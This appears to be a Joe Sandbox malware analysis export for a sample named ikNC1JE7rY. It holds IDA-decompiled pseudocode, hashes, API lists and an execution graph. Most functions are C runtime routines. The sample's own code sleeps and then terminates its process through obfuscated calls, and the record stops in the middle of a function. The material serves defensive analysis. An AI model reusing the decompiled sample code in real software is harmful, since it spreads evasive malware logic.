                        • Opcode ID: 46fff19aee5ea9a8fc14b2be84dca0e4e1a437739d758bfb5711d77188212393
                        • Instruction ID: 9b88df73e6d6caaa745b4f3553991fb21252c6c8a82537d4f00f019dc99cf697
                        • Opcode Fuzzy Hash: 46fff19aee5ea9a8fc14b2be84dca0e4e1a437739d758bfb5711d77188212393
                        • Instruction Fuzzy Hash: 4C41B571A00604EBDB24DF6A88D45AFB7B5AF80324F248B3BE455A72C0D779ED41CB48
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004169D6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                        				intOrPtr _v8;
                        				signed int _v12;
                        				char _v20;
                        				signed int _t54;
                        				intOrPtr _t56;
                        				int _t57;
                        				int _t58;
                        				signed short* _t59;
                        				short* _t60;
                        				int _t65;
                        				char* _t72;
                        
                        				_t72 = _a8;
                        				if(_t72 == 0 || _a12 == 0) {
                        					L5:
                        					return 0;
                        				} else {
                        					if( *_t72 != 0) {
                        						E004089C3( &_v20, _a16);
                        						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
                        							if(E00410D20( *_t72 & 0x000000ff,  &_v20) == 0) {
                        								if(MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
                        									L10:
                        									if(_v8 != 0) {
                        										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                        									}
                        									return 1;
                        								}
                        								L21:
                        								_t54 = E00407F57();
                        								 *_t54 = 0x2a;
                        								if(_v8 != 0) {
                        									_t54 = _v12;
                        									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
                        								}
                        								return _t54 | 0xffffffff;
                        							}
                        							_t56 = _v20;
                        							_t65 =  *(_t56 + 0xac);
                        							if(_t65 <= 1 || _a12 < _t65) {
                        								L17:
                        								if(_a12 <  *(_t56 + 0xac) || _t72[1] == 0) {
                        									goto L21;
                        								} else {
                        									goto L19;
                        								}
                        							} else {
                        								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                        								_t56 = _v20;
                        								if(_t58 != 0) {
                        									L19:
                        									_t57 =  *(_t56 + 0xac);
                        									if(_v8 == 0) {
                        										return _t57;
                        									}
                        									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                        									return _t57;
                        								}
                        								goto L17;
                        							}
                        						}
                        						_t59 = _a4;
                        						if(_t59 != 0) {
                        							 *_t59 =  *_t72 & 0x000000ff;
                        						}
                        						goto L10;
                        					} else {
                        						_t60 = _a4;
                        						if(_t60 != 0) {
                        							 *_t60 = 0;
                        						}
                        						goto L5;
                        					}
                        				}
                        			}














                        0x004169e0
                        0x004169e7
                        0x004169fe
                        0x00000000
                        0x004169ee
                        0x004169f0
                        0x00416a0a
                        0x00416a15
                        0x00416a47
                        0x00416ae5
                        0x00416a25
                        0x00416a28
                        0x00416a2d
                        0x00416a2d
                        0x00000000
                        0x00416a33
                        0x00416aa7
                        0x00416aa7
                        0x00416aac
                        0x00416ab5
                        0x00416ab7
                        0x00416aba
                        0x00416aba
                        0x00000000
                        0x00416abe
                        0x00416a49
                        0x00416a4c
                        0x00416a55
                        0x00416a7c
                        0x00416a85
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00416a5c
                        0x00416a6f
                        0x00416a77
                        0x00416a7a
                        0x00416a8c
                        0x00416a8c
                        0x00416a95
                        0x00416a03
                        0x00416a03
                        0x00416a9e
                        0x00000000
                        0x00416a9e
                        0x00000000
                        0x00416a7a
                        0x00416a55
                        0x00416a17
                        0x00416a1c
                        0x00416a22
                        0x00416a22
                        0x00000000
                        0x004169f2
                        0x004169f2
                        0x004169f7
                        0x004169fb
                        0x004169fb
                        0x00000000
                        0x004169f7
                        0x004169f0

                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00416A0A
                        • __isleadbyte_l.LIBCMT ref: 00416A3E
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 00416A6F
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 00416ADD
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: 0bd4586eaa071df3d80ff8fe1865f9c236fdafe29b5be2a119ff0eb7e6a2e53d
                        • Instruction ID: 3fcc8875d0a542d9fff72c78a7b0d81b7994ca812fa713602b319536ce183172
                        • Opcode Fuzzy Hash: 0bd4586eaa071df3d80ff8fe1865f9c236fdafe29b5be2a119ff0eb7e6a2e53d
                        • Instruction Fuzzy Hash: CA31E031A10285EFCB20DF64C8809FE3BB5BF02351B1685AAE466AB291D734DD80DB59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040947A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                        				intOrPtr _t25;
                        				void* _t26;
                        				void* _t28;
                        
                        				_t25 = _a16;
                        				if(_t25 == 0x65 || _t25 == 0x45) {
                        					_t26 = E00408D6B(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                        					goto L9;
                        				} else {
                        					_t34 = _t25 - 0x66;
                        					if(_t25 != 0x66) {
                        						__eflags = _t25 - 0x61;
                        						if(_t25 == 0x61) {
                        							L7:
                        							_t26 = E00408E5B(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                        						} else {
                        							__eflags = _t25 - 0x41;
                        							if(__eflags == 0) {
                        								goto L7;
                        							} else {
                        								_t26 = E00409380(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                        							}
                        						}
                        						L9:
                        						return _t26;
                        					} else {
                        						return E004092C5(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                        					}
                        				}
                        			}






                        0x0040947f
                        0x00409485
                        0x004094f8
                        0x00000000
                        0x0040948c
                        0x0040948c
                        0x0040948f
                        0x004094aa
                        0x004094ad
                        0x004094cd
                        0x004094df
                        0x004094af
                        0x004094af
                        0x004094b2
                        0x00000000
                        0x004094b4
                        0x004094c6
                        0x004094c6
                        0x004094b2
                        0x004094fd
                        0x00409501
                        0x00409491
                        0x004094a9
                        0x004094a9
                        0x0040948f

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                        • String ID:
                        • API String ID: 3016257755-0
                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                        • Instruction ID: 4be076c938bceef63c2f506d0f7b89980f48a47c416f2f60de0c2e2cad521dc1
                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                        • Instruction Fuzzy Hash: 2311837240414EBBCF125E85DC41CEE3F22BB58354F19842AFE18641B2C73AC972AB85
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E0040F45F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                        				signed int _t13;
                        				intOrPtr _t27;
                        				intOrPtr _t29;
                        				void* _t30;
                        				void* _t31;
                        
                        				_t31 = __eflags;
                        				_t26 = __edi;
                        				_t25 = __edx;
                        				_t22 = __ebx;
                        				_push(0xc);
                        				_push(0x417c58);
                        				E0040C128(__ebx, __edi, __esi);
                        				_t29 = E00409F6C(__ebx, __edx, _t31);
                        				_t13 =  *0x42d194; // 0xfffffffe
                        				if(( *(_t29 + 0x70) & _t13) == 0) {
                        					L6:
                        					E0040DB4D(_t22, _t26, 0xc);
                        					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                        					_t8 = _t29 + 0x6c; // 0x6c
                        					_t27 =  *0x42d278; // 0x42d1a0
                        					 *((intOrPtr*)(_t30 - 0x1c)) = E0040F421(_t8, _t27);
                        					 *(_t30 - 4) = 0xfffffffe;
                        					E0040F4C9();
                        				} else {
                        					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                        					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                        						goto L6;
                        					} else {
                        						_t29 =  *((intOrPtr*)(E00409F6C(_t22, __edx, _t33) + 0x6c));
                        					}
                        				}
                        				if(_t29 == 0) {
                        					E0040CCA3(_t25, 0x20);
                        				}
                        				return E0040C16D(_t29);
                        			}








                        0x0040f45f
                        0x0040f45f
                        0x0040f45f
                        0x0040f45f
                        0x0040f45f
                        0x0040f461
                        0x0040f466
                        0x0040f470
                        0x0040f472
                        0x0040f47a
                        0x0040f49e
                        0x0040f4a0
                        0x0040f4a6
                        0x0040f4aa
                        0x0040f4ad
                        0x0040f4b8
                        0x0040f4bb
                        0x0040f4c2
                        0x0040f47c
                        0x0040f47c
                        0x0040f480
                        0x00000000
                        0x0040f482
                        0x0040f487
                        0x0040f487
                        0x0040f480
                        0x0040f48c
                        0x0040f490
                        0x0040f495
                        0x0040f49d

                        APIs
                        • __getptd.LIBCMT ref: 0040F46B
                          • Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
                          • Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C
                        • __getptd.LIBCMT ref: 0040F482
                        • __amsg_exit.LIBCMT ref: 0040F490
                        • __lock.LIBCMT ref: 0040F4A0
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                        • String ID:
                        • API String ID: 3521780317-0
                        • Opcode ID: c1e460487b385be20c3997de28e1949703a13e7a47ebf47c8db6bc9826152023
                        • Instruction ID: ad62b0fe31f90ab5027265babbd9e778aec5ed69125f5d0d4d1c1e1c356c8084
                        • Opcode Fuzzy Hash: c1e460487b385be20c3997de28e1949703a13e7a47ebf47c8db6bc9826152023
                        • Instruction Fuzzy Hash: 95F09631B04700DBE730FB75840275F72A05B50714F51427FA984B7AD2CB3C9905CA9D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040AFE2() {
                        				intOrPtr _t5;
                        				intOrPtr _t6;
                        				intOrPtr _t10;
                        				void* _t12;
                        				intOrPtr _t15;
                        				intOrPtr* _t16;
                        				signed int _t19;
                        				signed int _t20;
                        				intOrPtr _t26;
                        				intOrPtr _t27;
                        
                        				_t5 =  *0x430280;
                        				_t26 = 0x14;
                        				if(_t5 != 0) {
                        					if(_t5 < _t26) {
                        						_t5 = _t26;
                        						goto L4;
                        					}
                        				} else {
                        					_t5 = 0x200;
                        					L4:
                        					 *0x430280 = _t5;
                        				}
                        				_t6 = E00410529(_t5, 4);
                        				 *0x42f260 = _t6;
                        				if(_t6 != 0) {
                        					L8:
                        					_t19 = 0;
                        					_t15 = 0x42c7b0;
                        					while(1) {
                        						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                        						_t15 = _t15 + 0x20;
                        						_t19 = _t19 + 4;
                        						if(_t15 >= 0x42ca30) {
                        							break;
                        						}
                        						_t6 =  *0x42f260;
                        					}
                        					_t27 = 0xfffffffe;
                        					_t20 = 0;
                        					_t16 = 0x42c7c0;
                        					do {
                        						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x42f160 + (_t20 >> 5) * 4))));
                        						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                        							 *_t16 = _t27;
                        						}
                        						_t16 = _t16 + 0x20;
                        						_t20 = _t20 + 1;
                        					} while (_t16 < 0x42c820);
                        					return 0;
                        				} else {
                        					 *0x430280 = _t26;
                        					_t6 = E00410529(_t26, 4);
                        					 *0x42f260 = _t6;
                        					if(_t6 != 0) {
                        						goto L8;
                        					} else {
                        						_t12 = 0x1a;
                        						return _t12;
                        					}
                        				}
                        			}













                        0x0040afe2
                        0x0040afea
                        0x0040afed
                        0x0040aff8
                        0x0040affa
                        0x00000000
                        0x0040affa
                        0x0040afef
                        0x0040afef
                        0x0040affc
                        0x0040affc
                        0x0040affc
                        0x0040b004
                        0x0040b00b
                        0x0040b012
                        0x0040b032
                        0x0040b032
                        0x0040b034
                        0x0040b040
                        0x0040b040
                        0x0040b043
                        0x0040b046
                        0x0040b04f
                        0x00000000
                        0x00000000
                        0x0040b03b
                        0x0040b03b
                        0x0040b053
                        0x0040b054
                        0x0040b056
                        0x0040b05c
                        0x0040b070
                        0x0040b076
                        0x0040b080
                        0x0040b080
                        0x0040b082
                        0x0040b085
                        0x0040b086
                        0x0040b092
                        0x0040b014
                        0x0040b017
                        0x0040b01d
                        0x0040b024
                        0x0040b02b
                        0x00000000
                        0x0040b02d
                        0x0040b02f
                        0x0040b031
                        0x0040b031
                        0x0040b02b

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: __calloc_crt
                        • String ID: (!@
                        • API String ID: 3494438863-861706809
                        • Opcode ID: 3b89cfb7374a4b6736355ee4ea9648d338a4dcc5e1c608bee5186004743057a2
                        • Instruction ID: c81a334fc5c2411f4df701e27ede37d27c0d3a282a9f30c1c91d009ecc8411c5
                        • Opcode Fuzzy Hash: 3b89cfb7374a4b6736355ee4ea9648d338a4dcc5e1c608bee5186004743057a2
                        • Instruction Fuzzy Hash: 5211C6723043159BE7388A1DBC946672395EB85B68B64427BF521EB3D0E73CCC8256CD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E0040A6C8(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                        				intOrPtr _t17;
                        				intOrPtr* _t28;
                        				void* _t29;
                        				void* _t30;
                        
                        				_t30 = __eflags;
                        				_t28 = __esi;
                        				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                        				E004070B6(__ebx, __edi, __esi,  *((intOrPtr*)(_t29 - 0x28)));
                        				 *((intOrPtr*)(E00409F6C(__ebx, __edx, _t30) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                        				_t17 = E00409F6C(__ebx, __edx, _t30);
                        				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                        				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                        					_t17 =  *((intOrPtr*)(__esi + 0x14));
                        					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                        						if( *((intOrPtr*)(_t29 - 0x34)) == 0 &&  *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                        							_t17 = E0040708F( *((intOrPtr*)(_t28 + 0x18)));
                        							_t38 = _t17;
                        							if(_t17 != 0) {
                        								_push( *((intOrPtr*)(_t29 + 0x10)));
                        								_push(_t28);
                        								return E0040A460(_t38);
                        							}
                        						}
                        					}
                        				}
                        				return _t17;
                        			}







                        0x0040a6c8
                        0x0040a6c8
                        0x0040a6cb
                        0x0040a6d1
                        0x0040a6df
                        0x0040a6e5
                        0x0040a6ed
                        0x0040a6f9
                        0x0040a701
                        0x0040a709
                        0x0040a71d
                        0x0040a728
                        0x0040a72e
                        0x0040a730
                        0x0040a732
                        0x0040a735
                        0x00000000
                        0x0040a73c
                        0x0040a730
                        0x0040a71d
                        0x0040a709
                        0x0040a73d

                        APIs
                          • Part of subcall function 004070B6: __getptd.LIBCMT ref: 004070BC
                          • Part of subcall function 004070B6: __getptd.LIBCMT ref: 004070CC
                        • __getptd.LIBCMT ref: 0040A6D7
                          • Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
                          • Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C
                        • __getptd.LIBCMT ref: 0040A6E5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: __getptd$__amsg_exit__getptd_noexit
                        • String ID: csm
                        • API String ID: 803148776-1018135373
                        • Opcode ID: 5b147aff4b10d651f4ceec80f303942da5f950dc06aa6b0fc585759805665184
                        • Instruction ID: 2975dbf0f67d70b07405766a2e2fa21c276c90f76bf20612886aa0b38ed4f4f2
                        • Opcode Fuzzy Hash: 5b147aff4b10d651f4ceec80f303942da5f950dc06aa6b0fc585759805665184
                        • Instruction Fuzzy Hash: D70128368013058ACF349F25C454AAEB3B5AF14315F55893FE482BB7D2CB38D9A1CE1A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:6.1%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:19
                        Total number of Limit Nodes:0
                        execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                        Control-flow Graph

                        C-Code - Quality: 23%
                        			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                        				char _v8;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				void* _t11;
                        				void* _t16;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t22 = __eflags;
                        				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                        				_t17 = _a4;
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                        				if(_t11 != 0) {
                        					_push(_a16);
                        					_push(_v8);
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, _t20); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				return __eax;
                        			}














                        0x0040180c
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.394197178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                        • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                        • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                        • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.394197178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                        • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                        • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                        • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 17%
                        			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t11;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t22;
                        
                        				_t23 = __eflags;
                        				asm("out 0x95, eax");
                        				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t17 =  *((intOrPtr*)(_t22 + 8));
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                        				if(_t11 != 0) {
                        					_push( *((intOrPtr*)(_t22 + 0x14)));
                        					_push( *((intOrPtr*)(_t22 - 4)));
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, __edi); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}







                        0x00401822
                        0x00401822
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.394197178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                        • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                        • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                        • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 17%
                        			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t8;
                        				void* _t11;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t22;
                        
                        				_t23 = __eflags;
                        				asm("sbb ebx, ebp");
                        				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t17 =  *((intOrPtr*)(_t22 + 8));
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                        				if(_t11 != 0) {
                        					_push( *((intOrPtr*)(_t22 + 0x14)));
                        					_push( *((intOrPtr*)(_t22 - 4)));
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, __edi); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}








                        0x00401826
                        0x00401826
                        0x00401839
                        0x0040183e
